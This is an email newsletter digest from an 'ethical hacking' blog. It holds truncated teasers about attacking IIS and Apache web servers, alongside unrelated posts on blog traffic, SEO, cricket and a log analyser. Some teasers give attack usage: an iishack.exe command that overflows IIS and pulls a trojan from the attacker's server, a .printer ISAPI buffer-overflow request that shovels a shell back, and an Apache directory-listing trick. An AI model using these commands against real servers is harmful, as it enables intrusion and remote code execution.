Free Hacking News Letter |
- How to ROOT a Server? Tools & software useful to hack web servers: Learn server hacking
- What are IIS Components? Learn IIS server hacking
- Canonicalization : Vulnerability : Exploit : Unicode
- Attacks against IIS: How to Hack IIS servers
- What is Vulnerability? How to execute Exploits on a known vulnerablity
- What is ISAPI Extension? ISAPI working & ISAPI DLL Buffer Overflows
- Apache Vulnerability: Hack Apache based Web Servers
- Popular Web Servers : Hacking Web Servers
- How Web Servers Work : How to Hack Web Servers
- How to ROOT a Server? Learn Hacking Web Servers: How to hack web servers?
- Want More Blog Traffic! Submit Your New Blog Here For Free
- How to Analysis your website for search engine optimization
- Dhoni vs Afridi: De Ghumaaaake!! India vs Pakistan World-cup Semifinal
- W3Perl: A Tool to Analyse Your Web Activity | Chintan Gurjar
How to ROOT a Server? Tools & software useful to hack web servers: Learn server hacking Posted: 30 Mar 2011 01:49 PM PDT Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script."IIS Hack" is a buffer overflow vulnerability exposed by the way IIS... Do you want to read more..Visit my site @ http://www.amarjit.info |
What are IIS Components? Learn IIS server hacking Posted: 30 Mar 2011 01:49 PM PDT IIS Components IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. Example: Server side scripting, Content Indexing, Web Based printing etc. This architecture provides attackers with different functionality to exploit via malicious input. IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. Example: Server side... Do you want to read more..Visit my site @ http://www.amarjit.info |
Canonicalization : Vulnerability : Exploit : Unicode Posted: 30 Mar 2011 01:49 PM PDT Canonicalization Canonicalization is the process by which various equivalent forms of a name can be resolved to a single, standard name - the so-called canonical name. For example, on a given machine, the names c:\dir\test.dat, test.dat, and ..\..\test.dat might all refer to the same file. Canonicalization is the process by which such names would be mapped to a name like c: \dir\test.dat. Vulnerability When certain types of files are requested via a specially-malformed URL, the... Do you want to read more..Visit my site @ http://www.amarjit.info |
Attacks against IIS: How to Hack IIS servers Posted: 30 Mar 2011 01:49 PM PDT Attacks against IISIIS is one of the most widely used Web server platforms on the Internet.Microsoft's Web Server has been the frequent target over the years.It has been attacked by various vulnerabilities. Examples include:::$DATA vulnerabilityshowcode.asp vulnerabilityPiggy backing vulnerabilityPrivilege command executionBuffer Overflow exploits (IIShack.exe) Let us look at some of the technology that forms the basis of web applications.Simple HTML could not contribute much to the dynamic... Do you want to read more..Visit my site @ http://www.amarjit.info |
What is Vulnerability? How to execute Exploits on a known vulnerablity Posted: 30 Mar 2011 01:49 PM PDT The vulnerability arises when a buffer of approx. 420 bytes is sent within the HTTP Host: header for a .printer ISAPI request. Remotely exploits buffer overflow, inserts shellcode to "shovel a shell" back to a listener on attacker's system.Example:GET /NULL.printer HTTP/1.0Host: [buffer] (Where [buffer] is approx. 420 characters.)When exploited, an attacker would have caused a buffer overflow within IIS and have overwritten EIP. Now normally the web server would stop responding once the... Do you want to read more..Visit my site @ http://www.amarjit.info |
What is ISAPI Extension? ISAPI working & ISAPI DLL Buffer Overflows Posted: 30 Mar 2011 01:48 PM PDT ISAPI Extension An ISAPI extension is a dynamic link library (.dll) that uses ISAPI to provide a set of web functions above and beyond those natively provided by IIS. ISAPI is developed to provide advantage over the shortcomings of Common Gateway Interface, CGI. An ISAPI extension is a regular DLL file that exposes three special functions that are called by the calling process (i.e., IIS) and therefore, will be loaded to memory only once, irrespective of how many clients are going to use... Do you want to read more..Visit my site @ http://www.amarjit.info |
Apache Vulnerability: Hack Apache based Web Servers Posted: 30 Mar 2011 01:48 PM PDT Apache Vulnerability The Apache Week tracks the vulnerabilities in Apache Server. Even Apache has its share of bugs and fixes. For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20. Long URLs passing through the mod_negative, mod_dir and mode_autoindex modules could cause Apache to list directory contents. The concept is simple but requires a few trial runs. A URL with a large number of trailing slashes: /cgi-bin /////////////////////////// /... Do you want to read more..Visit my site @ http://www.amarjit.info |
Popular Web Servers : Hacking Web Servers Posted: 30 Mar 2011 01:48 PM PDT The popular web servers are Apache Web Server, Internet Information Server and Sun ONE Web Server. The Apache Web Server is an open-source web server for modern operating systems including UNIX and Windows NT. The server provides HTTP services in sync with the current HTTP standards in an efficient and extensible environment. The Java Web Server / Sun ONE Web Server is one of the other highly available Web servers on the market. Microsoft's Internet Information Server is another popular... Do you want to read more..Visit my site @ http://www.amarjit.info |
How Web Servers Work : How to Hack Web Servers Posted: 30 Mar 2011 01:48 PM PDT The browser breaks the URL into three parts: The protocol ("http") The server name ("www.website.com") The file name ("webpage.html") The browser communicates with a name server, which translates the server name, www.website.com, into an IP address The browser then forms a connection to the Web server at that IP address on port 80. Following the HTTP protocol, the browser sends a GET request to the server, asking for the file http://webpage.html. The server sends the HTML text for... Do you want to read more..Visit my site @ http://www.amarjit.info |
How to ROOT a Server? Learn Hacking Web Servers: How to hack web servers? Posted: 30 Mar 2011 01:48 PM PDT The Internet is probably where security or the lack of it is seen the most. Often, a breach in security causes more damage in terms of goodwill than the actual quantifiable loss. This makes the security of web servers assume critical importance. Most organizations consider their Internet presence as an extension of themselves. In this module, we will explore: The basic function of a web server Popular web servers and common vulnerabilities Apache Web Server and known vulnerabilities ... Do you want to read more..Visit my site @ http://www.amarjit.info |
Want More Blog Traffic! Submit Your New Blog Here For Free Posted: 30 Mar 2011 01:33 PM PDT When your blog is new the only thing you want is traffic and the most easy, simple, best and successful methods are here mentioned below:Leave a comment at the bottom of this post with your blog's URL and describe your blog in a short paragraph.Subscribe to my RSS feed (In return, I will help you to boost your traffic).Subscribe to the other blogs' RSS feeds.Make sure you subscribe to the comments so that you get alerted on every new comment.Do not post as Anonymous user, it will be considered... Do you want to read more..Visit my site @ http://www.amarjit.info |
How to Analysis your website for search engine optimization Posted: 30 Mar 2011 01:46 PM PDT If Web page has a "0" Google™ PageRank™. PageRank™ denotes a Website's importance in the eyes of Google™.Fact: If you are not on the first page of search results, over 60% of Internet users will not find you!If Title Tag contains too many characters for what we consider a "robot friendly" Web page. The maximum number of characters we recommend for this Tag is 60.Fact: Alll major search engines including Google, Yahoo!, Scrub The Web, MSN Bing and others utilize Meta Tags! Don't take our word... Do you want to read more..Visit my site @ http://www.amarjit.info |
Dhoni vs Afridi: De Ghumaaaake!! India vs Pakistan World-cup Semifinal Posted: 29 Mar 2011 11:25 PM PDT Dhoni vs Afridi: De Ghumaaaake!! India vs Pakistan World-cup Semifinal Till now, was just the trailer, Here is the full version... Sachin: Haan Airport k liye taxi wahase milegi In Airport… airhostess asking Ponting, Smith, Sammy & Strauss why are u waiting here...? We are all waiting for AFRIDI.... ... Coming Soon Cheers for India !!!!!!!!!!!!!!!! ---Do you want to share you views?? Just leave a comment here. you can also drop an email on mail@amarjit.info---Regards, Amarjit Singh Do you want to read more..Visit my site @ http://www.amarjit.info |
W3Perl: A Tool to Analyse Your Web Activity | Chintan Gurjar Posted: 29 Mar 2011 10:59 PM PDT W3Perl is a logfile analyser based on logfiles parsing and distributed under the GPL licence. It require a configuration file which can be build from a web interface. A complete list of features is available in this section, with a short description of all scripts. The glossary is here to help you understanding your report. Main features - HTML output Easy to backup or move - Fast Work in incremental mode - WWW/FTP/Mail/Squid server Not restricted to web server - Email report... Do you want to read more..Visit my site @ http://www.amarjit.info |
You are subscribed to email updates from Learn Ethical Hacking Download Free Hacking Tools Learn Hacking and Join Indian Cyber Army To stop receiving these emails, you may unsubscribe now. | Email delivery powered by Google |
Google Inc., 20 West Kinzie, Chicago IL USA 60610 |
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.